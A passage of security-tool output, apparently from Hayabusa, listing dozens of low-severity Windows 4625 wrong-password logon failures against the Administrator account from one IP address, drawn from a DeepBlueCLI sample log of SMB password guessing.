XkuSlyTNc5OOoUtd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.676 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Z13YmupcMato8Sd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.733 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JedeMnLPnRJEwhZ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.810 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmy0c0wFheIRzSo4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.920 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sskKdqku5S0f1sWm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:23.962 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 15Qg0nCXNj7Ub1Sj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.004 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZD6iuaqv70k69G87 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.051 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gk3UuqTJmvH1snmN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.092 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zaw9iF5mJlyygdnB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.128 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Sr5PZAd1qMc7hi3c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.167 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l5xbQtyueVq3fJSG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.203 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g2nP0zz2ofBxTGw6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.237 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SYJheREJmEwj0791 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.277 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: exglD9fnLwaqwRZn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.325 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8bSAU1QjasDAsmry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.363 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cfnrtXR7evQBbaOw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.410 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KYAwjW99chcntPsQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.464 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rG2PYfOTfT7QvbPu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.508 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FojDtfDNXq0gQfYu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.549 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SUTT0QycbFtyJfNL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.596 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gcbv1lrcYdT9Wuli | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.636 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pjdFfvCCfGXo7FUf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.697 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rzqGdWlGglLQx6Z4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.749 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3Rt80PMk70sVqbk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.795 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: okunzcEHnxUml4SG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.842 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qH0AY3DeIryuHSiN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.886 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DjqtxY5Fly4qAusS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.935 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PXHYu7wAqo7m6mZn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:24.990 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UaEM3boErBRrCbna | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.040 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7nSzwstH2imPjwah | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.153 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Z6NM0I4vRTXlLKu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.193 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jYhjN3f8KlFIEUKy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.232 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qWicYt2HXLDgc3kc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.269 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uz7yqqxdMrsM2L1g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.308 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wqKTguT2Z3OPCxGR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.352 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ywpwCM4u6nFSq9oS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.407 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k1t5ZBw3HOxux65e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.534 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MtLFQSltjjOjdl2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.593 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AyFD3cjef0NUMZZ5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.656 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uDYECnF1YTKRKA3K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.700 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pfqxcIVpX9BbsPIM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.745 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mjL5hvyYesMfDISw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.774 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3bh8c5ohv55SAX26 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.817 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MflfcFDnGU3xUOmz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.859 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aX0wfTs5FzCdwGrR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.895 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9gdU6faDjEH5wW2X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.929 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 507PC8xD6l0TbhG3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.973 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VrWgYcf9EuXt4MHS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:26.088 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GvIGEw3fdX9cDzIV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:26.159 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9X1q0dT5irWa44Rz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:26.307 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZpgAkElSQjVo53z2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:26.410 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7nxUEwRMaiAhiIXv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:26.453 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vIoaysmFNfEerv8f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:26.528 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aHLhFgL0xfnrAIoF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:26.619 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YGK96B1hDPMK9YKh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:26.704 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yhDnNRDnAwctVtgQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:26.793 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8zzO7RKaBPpg549A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:26.859 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zDgDGO3IKiLoIQ5D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.024 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aaYeBTUEudC3446 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.093 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I41H8U06uuGlMf9S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.170 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r6Eh55149gbuU2el | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.248 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ajzJabQi7CjosFQ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.290 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l9y7gyU9aJi6Fpm3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.361 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hbLiIVcBYlu5JkX2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.424 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bDfEfHk54J3lJI6m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.496 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WOpuMTECalyeObl7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.537 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nZQYU1dyQOqlNJDL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.577 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pc58gDT07WNH3mMz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.624 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhExnDfInKbEI6AO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.710 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qKKTTQ0ZT2Ye4TV9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.772 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LdBFYyftnH67Gyh5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.812 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eO6c2PDl7zVBGzPi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.848 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1ONnDOs16EnBkdFv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.897 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aTHHCX9EoKRY4zhR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.939 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f1jhH08oLzpONDpa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.976 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o2YK7zc7Ne9c8txA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.013 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 86CrOo9CFreIzSM5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.056 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0X9UEojEnc350xPc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.096 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong 